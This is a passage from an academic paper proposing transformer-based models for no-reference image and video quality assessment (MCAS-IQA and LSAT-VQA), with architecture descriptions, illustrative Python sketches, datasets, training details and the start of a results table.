Furthermore, as both spatial and temporal video characteristics contribute to video quality, quality features derived in the two domains have also been considered simultaneously in VQA models [27, 28]. As a powerful representation tool, the transformer has already demonstrated outstanding performance in time-series data analysis, e.g., language modelling [29, 30]. Naturally, it should also be considered in VQA as a temporal pooling approach. You et al. [25] have proposed a long short-term convolutional transformer for VQA. In [31], video frames are first preprocessed (spatial and temporal down-sampling) and then fed into a transformer with sequential time and space attention blocks. However, despite its excellent representation capability, the transformer has a non-negligible problem: its time and memory complexity is quadratic in the sequence length. Recently, several attempts have been made to develop efficient transformer models in computer vision and time-series data processing. For example, dot-product attention was replaced by locality-sensitive hashing in Reformer to reduce the complexity [32]. Several efficient transformer models attempt to replace full-range attention modelling, as it contributes significantly to the high complexity of the original Transformer. Zhu et al. [33] proposed a long-short Transformer that aggregates a long-range attention with dynamic projection for distant correlations and a short-term attention for fine-grained local correlations. Liu et al. [34] used a shifted windowing (Swin) scheme to decompose full-range attention into non-overlapping local windows while also connecting neighbouring windows, reducing the complexity of the transformer to linear. In this work, we intend to propose a general, efficient framework for no-reference image and video quality assessment. Existing attention based IQA models mainly take
spatial selective attention into account that can be easily modelled by transformer models. We propose a multi-stage channel attention model based upon Swin Transformer to predict image quality. Channel attention can appropriately simulate the contrast sensitivity mechanism. The multi-stage structure can, on one hand, produce more accurate image quality perception, as demonstrated in existing IQA models [15–17]. On the other hand, such multi-stage structure can also generate more representative features covering different resolution scales to provide solid foundation for VQA tasks. Furthermore, inspired by the kernel idea of CNNs and RNNs that the kernels (e.g., convolution kernels) can be reused crossing individual image patches or time-steps, we also propose a locally shared attention module followed by a global transformer for VQA. Our experiments on large-scale IQA and VQA datasets will demonstrate promising performance of the proposed models. The remainder of the paper is organized as follows. Section 2 presents a multistage channel attention model using Swin Transformer as backbone for IQA. A VQA model using a locally shared attention module on frame quality features is detailed in Sect. 3. Experimental results and ablation studies are discussed in Sect. 4. Finally, Sect. 5 concludes the paper.
2 Multi-stage Channel Attention Integrated Swin Transformer for IQA (MCAS-IQA)
In the proposed visual quality assessment framework, an IQA model needs not only to predict image quality accurately, but also to serve as a general feature extractor for deriving quality features of video frames. Several mechanisms of the HVS play important roles in quality assessment, e.g., selective spatial attention, contrast sensitivity, and adaptive scalable perception. Selective spatial attention is an inherent mechanism describing that viewers often allocate more attention to certain areas in the visual field than to others. The attention allocation is determined by both viewing tasks and visual contents. Attention has already been widely studied in deep learning models, e.g., Swin Transformer and ViT [35] for image classification. However, transformer based image models only consider spatial attention. In the IQA scenario, another important mechanism, contrast sensitivity, plays a crucial role. Not all the distortions in an image can be perceived by the HVS. According to the CSF, visual sensitivity is maximized at the fovea, is determined by the spatial frequency of the visual stimuli, and declines with eccentricity away from the gaze [12]. In other words, contrast changes beyond a certain frequency threshold are imperceptible. Therefore, information in the frequency domain should also be considered in a deep learning driven IQA model. Even though frequency information is not explicitly represented by a deep learning model, it can be simulated by the channel outputs. For example, the Sobel operation is a convolutional operator that can distinguish high frequency information (e.g., edges) from low frequency information (e.g., plain areas). Since contrast sensitivity can be explained as visual stimuli of different frequencies triggering different degrees of attention in the visual system, we assume that it can be simulated by channel attention.
Most deep learning models for image processing attempt to aggregate representative features in a manner of transferring spatial domain to channel. Consequently, the features
for target tasks are often extracted from feature maps with a high channel dimension but reduced spatial resolution. Such an approach might be appropriate for classification or recognition purposes, while it can potentially lose information in the spatial domain in other scenarios. For example, feature fusion across low-stage and high-stage feature maps is beneficial for object detection. We believe that spatial information also plays an important role in image quality perception, and crucial information in the spatial domain might be lost if only the highest-stage feature map of a deep learning model is employed. Therefore, we use both low-stage and high-stage feature maps in the proposed IQA model. Swin Transformer uses a windowed architecture to reduce complexity. It also provides a hierarchical structure that facilitates information aggregation over different stages. The proposed IQA model employs Swin Transformer as its backbone network. However, Swin Transformer only accepts a fixed input image resolution. Because of the particular nature of quality assessment explained earlier, we avoid image rescaling so that the perceived image quality is not altered. In order to adapt images of arbitrary resolution to Swin Transformer, an adaptive spatial average pooling is performed during patch embedding. If the input size is set to 384 × 384 and the patch size to 4 × 4 in the Swin Transformer backbone, the pooling kernel size and stride are both set to 96 (= 384/4). After an image of arbitrary resolution has been divided into individual patches by a 2D convolution layer, the adaptive pooling layer is applied to bring the embedded patches to a fixed size for the subsequent processing.
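The adaptive pooling step can be illustrated with a small sketch. It is read here as mapping a patch grid of arbitrary size to a fixed grid (96 × 96 for a 384 × 384 input with 4 × 4 patches); that reading, the binning rule (floor for the start and ceiling for the end of each bin, one common convention), and the function name are assumptions made for illustration, and a single scalar per patch stands in for the embedding vector.

```python
def adaptive_avg_pool2d(grid, out_h, out_w):
    """Average-pool a 2D grid (list of rows) to a fixed out_h x out_w grid.

    Bin r covers input rows [floor(r*H/out_h), ceil((r+1)*H/out_h)), and
    likewise for columns, so every bin is non-empty for any input size.
    """
    in_h, in_w = len(grid), len(grid[0])
    pooled = []
    for r in range(out_h):
        r0 = (r * in_h) // out_h
        r1 = ((r + 1) * in_h + out_h - 1) // out_h  # integer ceiling
        row = []
        for c in range(out_w):
            c0 = (c * in_w) // out_w
            c1 = ((c + 1) * in_w + out_w - 1) // out_w
            cells = [grid[y][x] for y in range(r0, r1) for x in range(c0, c1)]
            row.append(sum(cells) / len(cells))
        pooled.append(row)
    return pooled


# Toy example: two patch grids of different sizes are both mapped to 6 x 6,
# standing in for grids of different image resolutions mapped to 96 x 96.
small = [[float(y * 12 + x) for x in range(12)] for y in range(9)]
large = [[float(y * 20 + x) for x in range(20)] for y in range(14)]
for grid in (small, large):
    out = adaptive_avg_pool2d(grid, 6, 6)
    print(len(grid), "x", len(grid[0]), "->", len(out), "x", len(out[0]))
```

Because the output grid is fixed, the backbone always receives the same number of tokens, while the input image itself is never resampled.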
Considering that the 2D convolution, whose number of kernels equals the embedding dimension, has already been performed and converts spatial image features to the channel domain, we assume that such adaptive pooling does not introduce a loss of spatial information for quality perception. Swin Transformer decomposes an input image into four stages, similarly to CNNs. The feature maps at each stage have different spatial and channel resolutions. As explained earlier, we believe that attention over channels should be considered at every stage, as the features in different channels can have different impacts on image quality perception. A lightweight channel attention block is built to represent the relative importance of different channel features. We propose to use a 1D dense layer (channel attention layer) with a Sigmoid activation function. A spatial average pooling is first performed on the feature maps at each stage, and the result is then multiplied with the channel attention layer. In this way, higher attention weights are assigned to more important information across channels during training. Furthermore, we propose to share the channel attention layer across stages, which has two advantages. First, sharing a dense layer significantly reduces the number of weights. Second, we assume that the attentional behavior over channels is similar at different stages, so sharing the attention layer forces the model to learn this similarity. Suppose that the features in different channels within a stage represent information from low to high frequency, and that this pattern is similar in other stages. Then, if the channel attention layer finds that features in certain frequency bands are more important than others in one Swin stage, this behavior should hold in the other stages as well. However, the feature maps have different channel numbers at individual stages.
In order to share the channel attention layer, a bottleneck conv-layer is used on the feature maps in different stages. The filter number of the bottleneck conv-layer is set to the same
J. You and Z. Zhang
as the channel number of the highest stage feature map, and the kernel size is 1 × 1. The bottleneck layer is applied to the feature maps at each stage to unify their channel dimension. The feature maps are then pooled by global spatial pooling and finally multiplied with the shared channel attention layer. Assuming that the bottleneck layer has K channels, a feature vector of size 1 × K is produced at each stage.
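The bottleneck, pooling and shared attention steps can be sketched as follows. This is an illustration under assumptions, not the authors' implementation: the attention is read as a squeeze-and-excitation style gate (the pooled vector is multiplied element-wise by a Sigmoid dense layer applied to itself), biases are omitted, and the names `stage_vector`, `bottleneck_w` and `attention_w` are hypothetical.

```python
import math


def matvec(weights, vector):
    """Multiply an (out x in) weight matrix by a vector."""
    return [sum(w * v for w, v in zip(row, vector)) for row in weights]


def global_avg_pool(feature_map):
    """feature_map: list of spatial positions, each a list of channel values."""
    count = len(feature_map)
    channels = len(feature_map[0])
    return [sum(pos[c] for pos in feature_map) / count for c in range(channels)]


def stage_vector(feature_map, bottleneck_w, attention_w):
    """Turn one stage's feature map into a 1 x K attention-weighted vector."""
    # A 1 x 1 convolution is the same linear map applied at every spatial position.
    unified = [matvec(bottleneck_w, pos) for pos in feature_map]
    pooled = global_avg_pool(unified)                                   # 1 x K
    gate = [1.0 / (1.0 + math.exp(-a)) for a in matvec(attention_w, pooled)]
    return [p * g for p, g in zip(pooled, gate)]


# Two toy stages with 2 and 3 channels, unified to K = 2 by separate bottlenecks.
shared_attention = [[0.0, 0.0], [0.0, 0.0]]            # one K x K layer for all stages
stage_a = [[1.0, 2.0], [3.0, 4.0]]                     # 2 positions, 2 channels
stage_b = [[1.0, 1.0, 1.0], [3.0, 3.0, 3.0]]           # 2 positions, 3 channels
vec_a = stage_vector(stage_a, [[1.0, 0.0], [0.0, 1.0]], shared_attention)
vec_b = stage_vector(stage_b, [[1.0, 0.0, 0.0], [0.0, 1.0, 1.0]], shared_attention)
print(vec_a, vec_b)
```

Each stage keeps its own bottleneck weights because the input channel counts differ, while the single `shared_attention` matrix is reused, which is what makes the sharing possible.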
Fig. 1. Architecture of the MCAS-IQA model (Swin-B with an input size of 384 is used for the Swin Transformer). The number below each node indicates the output shape.
Finally, a head layer is employed to derive image quality from the feature vectors. The head layer can be defined differently according to the prediction objective. In IQA tasks, MOS is often used to represent the perceived quality by averaging over multiple subjective voters. An IQA model can therefore predict a single MOS value of an image directly, or it can predict the distribution of quality scores over a rating scale, e.g., a commonly used five-point scale [bad, poor, fair, good, excellent]. In the former case, a dense layer with one unit and linear activation should be used as the head layer, and the MSE between the ground-truth MOS values and the predicted image quality is used as the loss function. In the latter case, five units with Softmax activation are often used in the dense head layer, and the cross-entropy, which measures the distance between quality score distributions, serves as the loss function. In the experiments we will demonstrate the two cases on two IQA datasets. There are two approaches to combine the feature vectors at different stages into image quality. One approach is to apply the head layer on the feature vector at each stage first and then average over stages; the other is to average the feature vectors over stages first and then apply the head layer. Our experiments have shown that the first approach performs slightly better than the second. Therefore, we have employed the first approach in this work, and Fig. 1 illustrates the architecture of the proposed MCAS-IQA model. As explained earlier, a feature vector of size 1 × K is derived at each stage, which conveys the most crucial and representative information for image quality perception in the spatial and channel (frequency) domains by taking the attention mechanism into account.
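A small sketch may help to make the two head variants concrete. It shows a five-unit Softmax head with cross-entropy, a single-value MSE loss, and the "head first, then average over stages" combination. Converting a predicted distribution to a MOS by taking its expectation over the scale 1 to 5 is an assumption added here for illustration; all function names are hypothetical.

```python
import math


def softmax(logits):
    """Numerically stable Softmax over a list of logits."""
    peak = max(logits)
    exps = [math.exp(x - peak) for x in logits]
    total = sum(exps)
    return [e / total for e in exps]


def cross_entropy(target_dist, predicted_dist, eps=1e-12):
    """Cross-entropy between a ground-truth and a predicted score distribution."""
    return -sum(t * math.log(p + eps) for t, p in zip(target_dist, predicted_dist))


def mse(targets, predictions):
    """Mean squared error for the single-MOS head."""
    return sum((t - p) ** 2 for t, p in zip(targets, predictions)) / len(targets)


def distribution_to_mos(dist, scale=(1, 2, 3, 4, 5)):
    """Assumed conversion: MOS as the expectation of the five-point distribution."""
    return sum(s * p for s, p in zip(scale, dist))


def average_stage_predictions(stage_logits):
    """First approach: apply the head (here Softmax) per stage, then average over stages."""
    dists = [softmax(logits) for logits in stage_logits]
    return [sum(d[i] for d in dists) / len(dists) for i in range(len(dists[0]))]


# Toy logits from four stages for one image.
stage_logits = [[0.1, 0.2, 1.5, 2.0, 0.3]] * 4
predicted = average_stage_predictions(stage_logits)
print(distribution_to_mos(predicted), cross_entropy([0.0, 0.1, 0.3, 0.5, 0.1], predicted))
```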
Subsequently, by concatenating the feature vectors from the four stages, we obtain quality features over different scales and assume that the features represent general perceptual clues to be used in video quality assessment. In our experiments, the Swin-B method with input size of 384 × 384 is used as the Swin Transformer backbone.
Visual Mechanisms Inspired Efficient Transformers
Consequently, K equals 256 and the concatenated quality feature vector on each frame has a shape of 1 × 1024.
Fig. 2. Architecture of the LSAT-VQA model and transformer encoder. The number below each node indicates output shape
3 Locally Shared Attention in Transformer for VQA (LSAT-VQA)

In the proposed visual quality assessment framework, the VQA model aggregates the quality features over all frames in a video sequence into a video quality score. In other words, video quality is derived by pooling the quality features in the temporal domain. Transformer has already demonstrated outstanding performance in processing time-series data, but its quadratic time and memory complexity impedes a direct use of Transformer for quality prediction of long video sequences. However, the basic unit of video quality perception might be short clips rather than individual frames. In an unreported subjective VQA experiment, we used a simple questionnaire to collect viewers' opinions on whether they assessed video quality based on individual frames, short segments or the whole sequence. Most viewers reported that they often recalled video clips, rather than frames, and combined the qualities of individual clips to determine the overall video quality. Thus, we propose to divide a video sequence into non-overlapping clips and process the quality features within individual clips; the overall video quality is finally derived by pooling over clips. An overlapping division of clips has also been tested, but no performance gain was obtained. Figure 2 illustrates the architecture of the LSAT-VQA model, and the details are presented as follows. The attention mechanism plays an important role in VQA. It can be reasonably assumed that viewers pay varying attention to different temporal segments. For example, varying contents and quality levels can potentially attract unbalanced attention in time. Such
uneven attention distribution can be modelled by the transformer encoder, as the self-attention module simulates the attention distribution over different segments in a video sequence. However, it is difficult to analyze the attentional behavior of quality assessment within a short segment. To the best of our knowledge, no psychovisual experiments have been conducted to study this issue. In this work, we hypothesize that an attention mechanism is also at play within a segment, i.e., different frames in a segment contribute unevenly to the quality at segment or clip level. More importantly, we presume that such an attention model can be shared across different clips. In other words, one attention block is reused in all the clips of a video sequence. This idea of weight sharing is widely used in other deep learning models, e.g., the same kernel is reused in a CNN or RNN. The difference is that we intend to use only one single attention block, rather than multiple kernels as in a CNN or RNN. This simplifies the modelling of short-term attention within video segments, and it can also significantly reduce the complexity of the subsequent global transformer model. The quality features from all the frames in a video clip are aggregated into a feature vector representing the perceptual information at clip level. Subsequently, the feature vectors from all the clips in a video sequence are fed into a global transformer encoder to generate the video quality prediction at sequence level. The multi-head attention (MHA) layer proposed in the original Transformer model [29] is used to model the attention distribution over frames in a clip. The dimension of MHA is set to 256, and the head number is set to 4 in this study. Our ablation studies show that the two parameters only have a minor impact on the performance of the proposed LSAT-VQA model. The MHA block produces a feature map with a shape of F × 256, where F is the number of frames in a clip.
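The local part of the pipeline (split into clips, apply one shared attention block to every clip, average over frames) can be sketched as below. This is a deliberately simplified illustration: it uses a single attention head with identity query/key/value projections instead of the four-head, 256-dimensional MHA described above, and the helper names are hypothetical.

```python
import math


def split_into_clips(frame_features, clip_len):
    """Split per-frame feature vectors into non-overlapping clips, zero-padding the last clip."""
    dim = len(frame_features[0])
    clips = []
    for start in range(0, len(frame_features), clip_len):
        clip = list(frame_features[start:start + clip_len])
        clip += [[0.0] * dim for _ in range(clip_len - len(clip))]
        clips.append(clip)
    return clips


def self_attention(clip):
    """Single-head scaled dot-product self-attention with identity projections (simplification)."""
    scale = math.sqrt(len(clip[0]))
    attended = []
    for query in clip:
        scores = [sum(a * b for a, b in zip(query, key)) / scale for key in clip]
        peak = max(scores)
        weights = [math.exp(s - peak) for s in scores]
        total = sum(weights)
        attended.append([
            sum(w / total * value[d] for w, value in zip(weights, clip))
            for d in range(len(query))
        ])
    return attended


def clip_vector(clip):
    """Aggregate one clip: shared attention over frames, then mean over frames."""
    attended = self_attention(clip)   # the same function (shared weights) serves every clip
    return [sum(frame[d] for frame in attended) / len(attended) for d in range(len(attended[0]))]


frames = [[1.0, 0.0] for _ in range(5)]          # 5 frames with toy 2-D quality features
clips = split_into_clips(frames, clip_len=2)     # 3 clips, the last one zero-padded
clip_vectors = [clip_vector(c) for c in clips]
print(len(clips), clip_vectors)
```

The global transformer then sees one vector per clip instead of one vector per frame, which is where the reduction in sequence length comes from.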
Subsequently, the average over frames is taken as the feature vector of this clip, with a shape of 1 × 256. In addition, VQA models must handle video sequences of different lengths. Transformer can tackle varying input lengths. However, in batch training, video sequences with different numbers of frames are usually padded to the same length within a batch. Zero padding is employed in this work. Consequently, the MHA block will also generate an all-zero feature vector on a clip consisting entirely of zero-padded frames. In order to exclude those padded frames from quality prediction, a masking operation is performed by marking those all-zero feature vectors and assigning a very small value as their attention weights in the transformer encoder. Subsequently, a global transformer encoder is applied to the feature vectors of all clips. Four key hyper-parameters characterize a transformer encoder, namely L (number of layers), D (model dimension), H (number of heads), and d_ff (dimension of the feed-forward network). In our experiments, we have found that a relatively shallow configuration, e.g., {L = 2, D = 64, H = 8, d_ff = 256}, produces promising performance for VQA. We assume that this is because the employed VQA datasets are rather small. In order to match the dimension of the feature vectors (i.e., 256) derived from the shared MHA block to the model dimension D of the transformer encoder, we first apply a feature projection layer to the feature vectors. A dense layer with D filters is used for feature projection. As swapping the order of different clips can affect the perceived video quality, positional information should be retained in the transformer encoder. A learnable positional embedding is added to the projected feature vectors. The positional embedding layer
is set sufficiently long to cover the maximal length of video clips in the used VQA databases, which can be truncated for shorter videos. Equation (1) roughly explains the shared MHA block (S_MHA) on frame quality features (QF), the feature projection layer (Proj), and the positional embedding (PE), where C denotes the number of non-overlapping clips in a video sequence.

$$
\begin{cases}
CF_j = \mathrm{S\_MHA}(QF_j), & QF_j \in \mathbb{R}^{1 \times K} \\
F_j = \mathrm{Proj}(CF_j), & CF_j \in \mathbb{R}^{1 \times 256} \\
Z_0 = [F_1 + PE_1; \cdots; F_C + PE_C], & F_j \in \mathbb{R}^{1 \times D},\ PE \in \mathbb{R}^{C \times D}
\end{cases}
\tag{1}
$$
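The last two rows of Eq. (1) can be sketched in a few lines, assuming that the clip vectors CF_j are already available. The projection is modelled as a plain dense layer and the positional embedding as a table that is truncated to the number of clips; the names `project` and `encoder_input`, and the toy dimensions, are hypothetical.

```python
def project(vector, weights, bias):
    """Dense projection of one clip vector to the model dimension D."""
    return [sum(w * v for w, v in zip(row, vector)) + b for row, b in zip(weights, bias)]


def encoder_input(clip_features, weights, bias, positional_embedding):
    """Build Z_0 = [F_1 + PE_1; ...; F_C + PE_C] for the C clips of one video."""
    if len(clip_features) > len(positional_embedding):
        raise ValueError("positional embedding is shorter than the number of clips")
    z0 = []
    for j, clip_feature in enumerate(clip_features):
        projected = project(clip_feature, weights, bias)
        # Only the first C rows of the embedding table are used (truncation).
        z0.append([f + p for f, p in zip(projected, positional_embedding[j])])
    return z0


# Toy setting: 3-D clip vectors projected to D = 2, embedding table for up to 3 clips.
weights = [[1.0, 0.0, 0.0], [0.0, 1.0, 1.0]]
bias = [0.0, 0.0]
pe_table = [[0.1, 0.1], [0.2, 0.2], [0.3, 0.3]]
z0 = encoder_input([[1.0, 2.0, 3.0], [0.0, 1.0, 0.0]], weights, bias, pe_table)
print(z0)
```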
It is noted that no extra classification token has been added to the beginning of the projected features, which is different from traditional transformer models for classification, e.g., BERT [30] and ViT [35]. Instead, the average of the transformer encoder output along the attended dimension is fed into the next process. The transformer encoder contains L layers, each consisting of a sublayer for multi-head attention (MHA) with mask and a position-wise feed-forward sublayer (FF). Layer normalization (LN) is performed on the residual connection around each sublayer. It should be noted that the MHA in the transformer encoder is different from the earlier shared MHA block. Equation (2) outlines the transformer encoder operating on the output from the shared MHA block, where Z'_l denotes the intermediate output of the attention sublayer in layer l.

$$
\begin{cases}
Z'_l = \mathrm{LN}(\mathrm{MHA}(Z_{l-1}) + Z_{l-1}) \\
Z_l = \mathrm{LN}(\mathrm{FF}(Z'_l) + Z'_l)
\end{cases}
\qquad l = 1, \cdots, L
\tag{2}
$$

The encoder outputs at the last encoder layer are then averaged over all the clips to produce a quality vector with a size of 1 × D. This quality vector is supposed to contain the most representative information for quality perception at the sequence level. Finally, a multi-layer perceptron head is applied to the quality vector to predict video quality. The head consists of two dense layers with a dropout layer in between. Following other transformer architectures, e.g., BERT, ViT and Swin Transformer, GELU activation is used in the first dense layer with d_ff units. As the goal of VQA in this task is to predict a single quality score, the second dense layer uses only one unit and linear activation. Accordingly, MSE is chosen as the loss function to measure the distance between the ground-truth MOS values and the predicted video quality.
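The masking of zero-padded clips described earlier can be illustrated with a short sketch. It assumes that padded clips are detected as all-zero vectors, that masked attention scores are replaced by a large negative constant before the Softmax, and that padded clips are also skipped when averaging the encoder output; the last point is an assumption, since the text only states that the outputs are averaged over clips. All names are hypothetical.

```python
import math


def clip_mask(clip_vectors):
    """True for real clips, False for all-zero (padded) clips."""
    return [any(value != 0.0 for value in vector) for vector in clip_vectors]


def masked_softmax(scores, mask, negative=-1e9):
    """Softmax in which masked positions receive a (practically) zero weight."""
    masked = [s if keep else negative for s, keep in zip(scores, mask)]
    peak = max(masked)
    exps = [math.exp(s - peak) for s in masked]
    total = sum(exps)
    return [e / total for e in exps]


def masked_mean(vectors, mask):
    """Average only the vectors of real clips."""
    kept = [v for v, keep in zip(vectors, mask) if keep]
    return [sum(v[d] for v in kept) / len(kept) for d in range(len(kept[0]))]


clip_vectors = [[2.0, 4.0], [4.0, 8.0], [0.0, 0.0]]   # the last clip is padding
mask = clip_mask(clip_vectors)
print(mask, masked_softmax([1.0, 1.0, 5.0], mask), masked_mean(clip_vectors, mask))
```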
4 Experiments and Discussions

4.1 IQA and VQA Datasets

Appropriate datasets are crucial for training deep learning models. Several large-scale databases with authentic distortions for IQA [8][36] and VQA [37][38] have been used in this work. To the best of our knowledge, there are currently three large-scale IQA datasets, including SPAQ [36], KonIQ-10k [8] and LIVE-FB [39]. SPAQ, containing 11,125 images with diverse resolutions, was produced in a controlled laboratory environment.
Hosu et al. conducted two large-scale quality assessment experiments on crowdsourcing platforms for IQA and VQA, respectively. Two datasets were published, namely the KonIQ-10k IQA dataset [8], containing over 10,000 images with a constant resolution of 1024 × 768, and the KonViD-1k VQA dataset [37], consisting of 1,200 videos with varying resolutions and durations. It should be noted that the quality score distributions from the participants have also been published in the KonIQ-10k dataset. Therefore, we can use the IQA model to predict the score distribution by using five units and Softmax activation in the head layer. On the other hand, only MOS values were published in the SPAQ dataset, so a single unit with linear activation is used in the head layer. In addition, although LIVE-FB [39] contains 39,806 images and is by far the largest IQA dataset, it is actually assembled from several existing databases intended for tasks other than IQA. Consequently, the MOS values of 92% of the images in LIVE-FB lie in a narrow range of [60, 80] out of the full range [0, 100], which makes the dataset inappropriate for training IQA models because it lacks representative distortions at diverse image quality levels. Thus, the evaluation of IQA models has been mainly conducted on KonIQ-10k and SPAQ in our experiments. In addition, another large-scale VQA dataset, YouTube-UGC [38], consists of 1,288 videos with authentic distortions. The evaluation of VQA models has been mainly performed on KonViD-1k and YouTube-UGC. Unlike other computer vision tasks, e.g., image classification and object detection, where individual databases can be combined directly, quality assessment datasets might be incompatible with each other. A tricky issue is quality level calibration between separate datasets. For example, two images with similar quality levels might be assigned dramatically different quality values in two subjective experiments, because the calibration levels deviate significantly.
Some researchers have attempted to combine multiple datasets to train a single IQA model, e.g., the UNIQUE model [40] and MDTVSFA [41]. In this work, however, we still concentrate on training IQA/VQA models on individual datasets. The individual datasets were randomly split into train, validation and test sets following the standard protocol. However, in order to avoid the long-tail issue, we first roughly divided the samples in each dataset into two complexity categories (low and high) based on the spatial perceptual information (SI) and temporal information (TI) defined by the ITU Recommendation [42]. The samples in each category were then roughly divided into five quality subcategories based on their MOS values. Finally, we randomly chose 80% of the samples in each subcategory as the train set, 10% as the validation set and the remaining 10% as the test set. This random split was repeated ten times. Furthermore, three other small-scale quality assessment datasets with authentic distortions, namely CID2013 [43] and CLIVE [44] for IQA, and LIVE-VQC [45] for VQA, have also been included to evaluate the generalization capabilities of different models. It should be noted that individual datasets use different ranges of MOS values, e.g., [0, 100] in SPAQ, CLIVE and LIVE-VQC, and [1, 5] in CID2013, KonIQ-10k, KonViD-1k and YouTube-UGC. For convenient evaluation across datasets, all the MOS values were linearly normalized into the range of [1, 5] in our experiments.
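The linear MOS normalization and the stratified 80/10/10 split can be sketched as follows. The sketch assumes that each sample already carries a stratum label such as (complexity category, quality subcategory); how the SI/TI thresholds and the five quality bins are chosen is not specified in the text, so the `key` function and the toy labels below are hypothetical.

```python
import random


def normalize_mos(mos, src_min, src_max, dst_min=1.0, dst_max=5.0):
    """Linearly map a MOS value from [src_min, src_max] to [dst_min, dst_max]."""
    return dst_min + (mos - src_min) * (dst_max - dst_min) / (src_max - src_min)


def stratified_split(samples, key, seed=0, train=0.8, val=0.1):
    """Split samples 80/10/10 inside every stratum given by key(sample)."""
    rng = random.Random(seed)
    strata = {}
    for sample in samples:
        strata.setdefault(key(sample), []).append(sample)
    split = {"train": [], "val": [], "test": []}
    for label in sorted(strata):
        group = list(strata[label])
        rng.shuffle(group)
        n_train = int(round(train * len(group)))
        n_val = int(round(val * len(group)))
        split["train"] += group[:n_train]
        split["val"] += group[n_train:n_train + n_val]
        split["test"] += group[n_train + n_val:]
    return split


# Toy data: 100 samples, stratum = (complexity in {0, 1}, quality bin in {0..4}).
samples = [{"id": i, "complexity": i % 2, "quality_bin": i % 5} for i in range(100)]
split = stratified_split(samples, key=lambda s: (s["complexity"], s["quality_bin"]))
print(len(split["train"]), len(split["val"]), len(split["test"]))
print(normalize_mos(50.0, 0.0, 100.0))
```

Repeating the call with ten different `seed` values would correspond to the ten random splits used in the experiments.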
4.2 Training Approach

The performance of deep learning models is heavily dependent on the training approach. For training the MCAS-IQA model, transfer learning was applied to the Swin Transformer backbone pretrained on ImageNet. However, there are no available large-scale pretrained models for video processing. Thus, the VQA models have been trained from scratch. In our experiments, the training process of each model was performed in two phases: pretrain and finetune. In both phases, a cosine-decay learning rate scheduler with warmup was used with the Adam optimizer. The base learning rate was determined from short training runs by varying the learning rate and monitoring the model results. We have found that 5e-5 and 1e-6 produced the best performance in the pretrain and finetune phases, respectively, when training the MCAS-IQA model. For training the LSAT-VQA model, we have finally used 1e-3 and 5e-5 as base learning rates in pretrain and finetune, respectively, together with a large batch size. Data augmentation is widely used in model training to increase the dataset size. However, due to the particularity of quality assessment, most image or video augmentation methods might be inappropriate as they can affect the perceived quality. We have investigated popular image augmentations, e.g., transformation and adding noise as implemented in [46], and found that only horizontal flip has no significant impact on image quality. For LSAT-VQA training, the quality features of horizontally flipped frames were also computed and included in the training process. In addition, 25% randomly chosen videos in the train set were reversed in each batch during training, i.e., the quality features ordered from the last frame to the first were fed into LSAT-VQA. Even though this approach seems to conflict with the observation that swapping video clips can affect video quality, we have found that using reversed videos in training improves the performance slightly.
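A cosine-decay schedule with warmup, as mentioned above, can be written compactly. The sketch assumes a linear warmup and a decay to a minimum rate of zero; the warmup length, the total step count and the function name are hypothetical, since the text only gives the base learning rates.

```python
import math


def cosine_decay_with_warmup(step, total_steps, base_lr, warmup_steps, min_lr=0.0):
    """Learning rate at a given step: linear warmup followed by cosine decay."""
    if step < warmup_steps:
        return base_lr * (step + 1) / warmup_steps
    progress = (step - warmup_steps) / max(1, total_steps - warmup_steps)
    return min_lr + 0.5 * (base_lr - min_lr) * (1.0 + math.cos(math.pi * progress))


# Base rate 5e-5 as in the MCAS-IQA pretrain phase; step counts are made up.
for step in (0, 50, 100, 550, 1000):
    print(step, cosine_decay_with_warmup(step, total_steps=1000, base_lr=5e-5, warmup_steps=100))
```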
During the training process, the Pearson linear correlation coefficient (PLCC) between the predicted quality scores and the ground-truth MOS on the validation set was used to monitor the performance of trained models. Early stopping has also been employed to avoid overfitting. All the models were trained on the individually split train sets on two GeForce RTX 3090 GPUs and the best weights were determined by the PLCC values on the validation sets. Subsequently, the model performance was evaluated on the test sets in terms of three criteria: PLCC, Spearman rank-order correlation (SROCC) and root mean squared error (RMSE) between the predicted quality scores and the ground-truth MOS values.

4.3 Comparison and Ablations of IQA Models

Table 1 reports the evaluation results of the proposed MCAS-IQA model compared against other state-of-the-art models, including several deep learning driven models: DeepBIQ [7], Koncept512 [8], TRIQ [14], MUSIQ [15], AIHIQnet [16], CaHDC [17] and hyperIQA [18]. Other detailed results can be found on the code repository page. The comparison results demonstrate that MCAS-IQA significantly outperforms the other compared models. We assume that the reasons are twofold. First, Swin Transformer as the backbone with large-scale pretraining has outstanding representative capability. Second, we presume that the proposed multi-stage architecture of shared channel attention can appropriately simulate the perceptual mechanisms of IQA.
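The three criteria reported in the result tables (PLCC, SROCC and RMSE) can be computed as in the following sketch, which uses the standard definitions and average ranks for ties. It is a plain-Python illustration with hypothetical function names, not the evaluation code used by the authors.

```python
import math


def pearson(x, y):
    """Pearson linear correlation coefficient (PLCC)."""
    n = len(x)
    mean_x, mean_y = sum(x) / n, sum(y) / n
    cov = sum((a - mean_x) * (b - mean_y) for a, b in zip(x, y))
    std_x = math.sqrt(sum((a - mean_x) ** 2 for a in x))
    std_y = math.sqrt(sum((b - mean_y) ** 2 for b in y))
    return cov / (std_x * std_y)


def ranks(values):
    """1-based ranks; tied values share their average rank."""
    order = sorted(range(len(values)), key=lambda i: values[i])
    result = [0.0] * len(values)
    i = 0
    while i < len(order):
        j = i
        while j + 1 < len(order) and values[order[j + 1]] == values[order[i]]:
            j += 1
        average_rank = (i + j) / 2 + 1
        for k in range(i, j + 1):
            result[order[k]] = average_rank
        i = j + 1
    return result


def spearman(x, y):
    """Spearman rank-order correlation (SROCC): Pearson correlation of the ranks."""
    return pearson(ranks(x), ranks(y))


def rmse(x, y):
    """Root mean squared error between predictions and ground truth."""
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(x, y)) / len(x))


mos = [1.0, 2.0, 3.0, 4.0, 5.0]
predicted = [1.1, 1.9, 3.2, 3.9, 5.3]
print(pearson(mos, predicted), spearman(mos, predicted), rmse(mos, predicted))
```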
Table 1. Evaluation results (average and standard deviation) on the test set on individual IQA datasets

| Models | KonIQ-10k PLCC↑ | KonIQ-10k SROCC↑ | KonIQ-10k RMSE↓ | SPAQ PLCC↑ | SPAQ SROCC↑ | SPAQ RMSE↓ |
|---|---|---|---|---|---|---|
| DeepBIQ | 0.873 ± 0.021 | 0.864 ± 0.037 | 0.284 ± 0.029 | 0.858 ± 0.027 | 0.861 ± 0.028 | 0.389 ± 0.035 |
| Koncept512 | 0.916 ± 0.116 | 0.909 ± 0.085 | 0.267 ± 0.094 | 0.831 ± 0.097 | 0.830 ± 0.080 | 0.384 ± 0.060 |
